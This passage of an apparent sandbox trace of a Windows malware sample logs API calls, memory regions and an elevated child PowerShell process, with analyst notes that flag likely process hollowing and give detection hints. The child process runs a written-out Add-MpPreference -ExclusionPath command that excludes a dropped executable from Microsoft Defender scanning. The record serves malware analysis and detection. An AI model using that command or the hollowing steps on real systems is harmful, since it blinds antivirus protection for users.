[70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x41e792, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, 
[65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, 
[250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, 
[431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
# Analyst note: the SetThreadContext entry immediately above passes
# ContextFlags=0x10002 (x86 integer registers only) with Eax=0x41e792 and
# Ebx=0x7efde000 for thread handle 0x360, and this call then resumes the same
# handle. The return value 0x1 is the previous suspend count, so the thread
# was suspended until now.
# NOTE(review): setting the integer registers of a suspended thread and then
# resuming it matches the last stage of process hollowing (MITRE ATT&CK
# T1055.012). The process creation and memory writes that would confirm this
# are outside this excerpt; check the earlier entries that reference
# hThread=0x360 before concluding.
[0157.047] ResumeThread (hThread=0x360) returned 0x1
[0157.272] CoGetContextToken (in: pToken=0x17e620 | out: pToken=0x17e620) returned 0x0
[0157.272] CObjectContext::QueryInterface () returned 0x0
[0157.272] CObjectContext::GetCurrentThreadType () returned 0x0
[0157.272] Release () returned 0x0
[0157.274] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x13880, cHandles=0x1, pHandles=0x634180*=0xac, lpdwindex=0x17e4cc | out: lpdwindex=0x17e4cc) returned 0x0
Thread:
id = 2
os_tid = 0xf68
Thread:
id = 3
os_tid = 0xf6c
[0062.535] CoGetContextToken (in: pToken=0xc5f99c | out: pToken=0xc5f99c) returned 0x800401f0
[0062.535] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
[0157.353] SetWindowLongW (hWnd=0x70044, nIndex=-4, dwNewLong=1995646429) returned 18680062
[0157.355] SetClassLongW (hWnd=0x70044, nIndex=-24, dwNewLong=1995646429) returned 0x11d08d6
[0157.356] PostMessageW (hWnd=0x70044, Msg=0x10, wParam=0x0, lParam=0x0) returned 1
[0157.357] GetModuleHandleW (lpModuleName=0x0) returned 0x1370000
[0157.358] UnregisterClassW (lpClassName="WindowsForms10.Window.8.app.0.141b42a_r14_ad1", hInstance=0x1370000) returned 0
[0157.362] IsWindow (hWnd=0x70060) returned 1
[0157.364] GetModuleHandleW (lpModuleName="user32.dll") returned 0x76860000
[0157.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x400, lpWideCharStr="DefWindowProcW", cchWideChar=14, lpMultiByteStr=0xc5f71c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefWindowProcW³oHè·\x90Dþwq\x9cùÅ", lpUsedDefaultChar=0x0) returned 14
# Analyst note: the address returned here for DefWindowProcW (0x76f325dd) is
# the same value as dwNewLong=1995646429 in the two calls below, and in the
# SetWindowLongW/SetClassLongW calls on hWnd=0x70044 earlier in this thread.
# nIndex=-4 is GWL_WNDPROC and nIndex=-24 is GCL_WNDPROC, so these calls point
# the window and class procedures back at the system default handler.
# NOTE(review): with the "WindowsForms10..." class being unregistered just
# above, this looks like .NET Windows Forms teardown rather than window
# procedure hooking; treat it as low signal when triaging.
[0157.364] GetProcAddress (hModule=0x76860000, lpProcName="DefWindowProcW") returned 0x76f325dd
[0157.365] SetWindowLongW (hWnd=0x70060, nIndex=-4, dwNewLong=1995646429) returned 18680142
[0157.365] SetClassLongW (hWnd=0x70060, nIndex=-24, dwNewLong=1995646429) returned 0x11d094e
[0157.365] IsWindow (hWnd=0x70060) returned 1
[0157.366] DestroyWindow (hWnd=0x70060) returned 0
[0157.366] PostMessageW (hWnd=0x70060, Msg=0x10, wParam=0x0, lParam=0x0) returned 1
[0157.366] SetConsoleCtrlHandler (HandlerRoutine=0x11d0926, Add=0) returned 1
[0157.367] EtwEventUnregister () returned 0x0
[0157.399] DeleteObject (ho=0x190a0b41) returned 1
[0157.400] DeleteObject (ho=0x110a01d2) returned 1
[0157.401] GdipDeleteFont (font=0x74e0e68) returned 0x0
[0157.402] GdipDeleteFont (font=0x74e0eb8) returned 0x0
[0157.404] GetCurrentObject (hdc=0x14010b69, type=0x6) returned 0xb0a0b67
[0157.404] SelectObject (hdc=0x14010b69, h=0x18a002e) returned 0xb0a0b67
[0157.405] DeleteObject (ho=0xb0a0b67) returned 1
[0157.406] DeleteDC (hdc=0x14010b69) returned 1
[0157.409] RestoreDC (hdc=0x0, nSavedDC=-1) returned 0
[0157.411] GdipDeleteFont (font=0x74e0e90) returned 0x0
[0157.414] CloseHandle (hObject=0x40) returned 1
[0157.432] GdipDisposeImage (image=0x7414d48) returned 0x0
[0157.448] CloseHandle (hObject=0x2a8) returned 1
[0157.448] CloseHandle (hObject=0x29c) returned 1
[0157.449] CloseHandle (hObject=0x3b0) returned 1
[0157.451] RegCloseKey (hKey=0x80000004) returned 0x0
[0157.453] CloseHandle (hObject=0x36c) returned 1
Thread:
id = 4
os_tid = 0xf70
Thread:
id = 5
os_tid = 0xf7c
Thread:
id = 6
os_tid = 0xf80
Thread:
id = 7
os_tid = 0xfa0
Thread:
id = 8
os_tid = 0xfa4
Thread:
id = 9
os_tid = 0xfc0
Thread:
id = 12
os_tid = 0xffc
Thread:
id = 18
os_tid = 0x858
# Analyst note: child process spawned by the analysis target (parent_id = "1",
# os_parent_pid 0xf60 is the sample's os_pid in the log header).
Process:
id = "2"
image_name = "powershell.exe"
# cmd_line below names the System32 path while filename shows SysWOW64: the
# parent is a 32-bit process (bitness = "32"), so WOW64 file-system
# redirection resolves the launch to the 32-bit PowerShell binary.
filename = "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe"
page_root = "0x3d746000"
os_pid = "0xfc8"
# 0x3000 is the high mandatory integrity level; together with the
# BUILTIN\Administrators group entry in os_groups below, the process runs
# elevated. NOTE(review): Add-MpPreference needs elevation, so the exclusion
# request was probably accepted; this log does not show the cmdlet result.
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "1"
os_parent_pid = "0xf60"
# Defense evasion (MITRE ATT&CK T1562.001, Impair Defenses): the sample asks
# Microsoft Defender to stop scanning an executable path under the user's
# AppData\Roaming directory. The random-looking file name is presumably the
# sample's own dropped copy; confirm against the file-write entries.
# Detection: Defender operational log event ID 5007 (configuration changed),
# new values under HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths,
# and process-creation telemetry for powershell.exe whose command line
# contains "Add-MpPreference -ExclusionPath" with a non-installer parent.
cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" Add-MpPreference -ExclusionPath \"C:\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe\""
cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f52a" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1455
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1456
start_va = 0x30000
end_va = 0x31fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 1457
start_va = 0x40000
end_va = 0x40fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1458
start_va = 0x50000
end_va = 0x53fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000050000"
filename = ""
Region:
id = 1459
start_va = 0x60000
end_va = 0x60fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000060000"
filename = ""
Region:
id = 1460
start_va = 0xa0000
end_va = 0xdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000a0000"
filename = ""
Region:
id = 1461
start_va = 0x210000
end_va = 0x24ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000210000"
filename = ""
Region:
id = 1462
start_va = 0x10f0000
end_va = 0x115afff
monitored = 0
entry_point = 0x10fd330
region_type = mapped_file
name = "powershell.exe"
filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")
Region:
id = 1463
start_va = 0x76d20000
end_va = 0x76ec8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1464
start_va = 0x76f00000
end_va = 0x7707ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")
Region:
id = 1465
start_va = 0x7efb0000
end_va = 0x7efd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efb0000"
filename = ""
Region:
id = 1466
start_va = 0x7efdb000
end_va = 0x7efddfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efdb000"
filename = ""
Region:
id = 1467
start_va = 0x7efde000
end_va = 0x7efdefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efde000"
filename = ""
Region:
id = 1468
start_va = 0x7efdf000
end_va = 0x7efdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efdf000"
filename = ""
Region:
id = 1469
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 1470
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1471
start_va = 0x7fff0000
end_va = 0x7fffffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007fff0000"
filename = ""
Region:
id = 1472
start_va = 0xe0000
end_va = 0x1dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000e0000"
filename = ""
Region:
id = 1473
start_va = 0x73690000
end_va = 0x736cefff
monitored = 0
entry_point = 0x736be088
region_type = mapped_file
name = "wow64.dll"
filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")
Region:
id = 1474
start_va = 0x73630000
end_va = 0x7368bfff
monitored = 0
entry_point = 0x7366f9f4
region_type = mapped_file
name = "wow64win.dll"
filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")
Region:
id = 1475
start_va = 0x73620000
end_va = 0x73627fff
monitored = 0
entry_point = 0x736220f8
region_type = mapped_file
name = "wow64cpu.dll"
filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")
Region:
id = 1476
start_va = 0x76b00000
end_va = 0x76c1efff
monitored = 0
entry_point = 0x76b15340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1477
start_va = 0x752b0000
end_va = 0x753bffff
monitored = 0
entry_point = 0x752c3283
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 1478
start_va = 0x76b00000
end_va = 0x76c1efff
monitored = 0
entry_point = 0x76b15340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1479
start_va = 0x76b00000
end_va = 0x76c1efff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000076b00000"
filename = ""
Region:
id = 1480
start_va = 0x76c20000
end_va = 0x76d19fff
monitored = 0
entry_point = 0x76c3a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1481
start_va = 0x76c20000
end_va = 0x76d19fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000076c20000"
filename = ""
Region:
id = 1482
start_va = 0x250000
end_va = 0x3cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000250000"
filename = ""
Region:
id = 1483
start_va = 0x752b0000
end_va = 0x753bffff
monitored = 0
entry_point = 0x752c3283
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 1484
start_va = 0x753c0000
end_va = 0x75406fff
monitored = 0
entry_point = 0x753c74c1
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")
Region:
id = 1485
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1486
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 1487
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 1522
start_va = 0x20000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 1523
start_va = 0xe0000
end_va = 0x146fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1524
start_va = 0x160000
end_va = 0x1dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000160000"
filename = ""
Region:
id = 1525
start_va = 0x76a60000
end_va = 0x76afffff
monitored = 0
entry_point = 0x76a749e5
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")
Region:
id = 1526
start_va = 0x75410000
end_va = 0x754bbfff
monitored = 0
entry_point = 0x7541a472
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")
Region:
id = 1527
start_va = 0x759a0000
end_va = 0x759b8fff
monitored = 0
entry_point = 0x759a4975
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")
Region:
id = 1528
start_va = 0x76970000
end_va = 0x76a5ffff
monitored = 0
entry_point = 0x76980569
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")
Region:
id = 1529
start_va = 0x74a50000
end_va = 0x74aaffff
monitored = 0
entry_point = 0x74a6a3b3
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")
Region:
id = 1530
start_va = 0x74a40000
end_va = 0x74a4bfff
monitored = 0
entry_point = 0x74a410e1
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")
Region:
id = 1531
start_va = 0x74930000
end_va = 0x74943fff
monitored = 0
entry_point = 0x74931da9
region_type = mapped_file
name = "atl.dll"
filename = "\\Windows\\SysWOW64\\atl.dll" (normalized: "c:\\windows\\syswow64\\atl.dll")
Region:
id = 1558
start_va = 0x76860000
end_va = 0x7695ffff
monitored = 0
entry_point = 0x7687b6ed
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")
Region:
id = 1559
start_va = 0x75220000
end_va = 0x752affff
monitored = 0
entry_point = 0x75236343
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")
Region:
id = 1560
start_va = 0x759c0000
end_va = 0x759c9fff
monitored = 0
entry_point = 0x759c36a0
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll")
Region:
id = 1561
start_va = 0x74d40000
end_va = 0x74ddcfff
monitored = 0
entry_point = 0x74d73fd7
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll")
Region:
id = 1562
start_va = 0x75740000
end_va = 0x7589bfff
monitored = 0
entry_point = 0x7578ba3d
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")
Region:
id = 1563
start_va = 0x75130000
end_va = 0x751befff
monitored = 0
entry_point = 0x75133fb1
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")
Region:
id = 1564
start_va = 0x73500000
end_va = 0x73549fff
monitored = 1
entry_point = 0x73502e54
region_type = mapped_file
name = "mscoree.dll"
filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll")
Region:
id = 1569
start_va = 0x3d0000
end_va = 0x54ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003d0000"
filename = ""
Region:
id = 1570
start_va = 0x70000
end_va = 0x8dfff
monitored = 0
entry_point = 0x8158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 1571
start_va = 0x550000
end_va = 0x6d7fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000550000"
filename = ""
Region:
id = 1572
start_va = 0x70000
end_va = 0x8dfff
monitored = 0
entry_point = 0x8158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 1575
start_va = 0x75550000
end_va = 0x755affff
monitored = 0
entry_point = 0x7556158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 1576
start_va = 0x74c40000
end_va = 0x74d0bfff
monitored = 0
entry_point = 0x74c4168b
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll")
Region:
id = 1578
start_va = 0x6e0000
end_va = 0x860fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006e0000"
filename = ""
Region:
id = 1579
start_va = 0x1160000
end_va = 0x255ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001160000"
filename = ""
Region:
id = 1588
start_va = 0x30000
end_va = 0x32fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "powershell.exe.mui"
filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui")
Region:
id = 1589
start_va = 0x70000
end_va = 0x70fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000070000"
filename = ""
Region:
id = 1590
start_va = 0x80000
end_va = 0x80fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000080000"
filename = ""
Region:
id = 1591
start_va = 0x3d0000
end_va = 0x47ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003d0000"
filename = ""
Region:
id = 1592
start_va = 0x540000
end_va = 0x54ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000540000"
filename = ""
Region:
id = 1593
start_va = 0x870000
end_va = 0xa5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000870000"
filename = ""
Region:
id = 1594
start_va = 0x733b0000
end_va = 0x7343cfff
monitored = 1
entry_point = 0x733c2860
region_type = mapped_file
name = "mscoreei.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll")
Region:
id = 1595
start_va = 0x734f0000
end_va = 0x734f2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-synch-l1-2-0.dll"
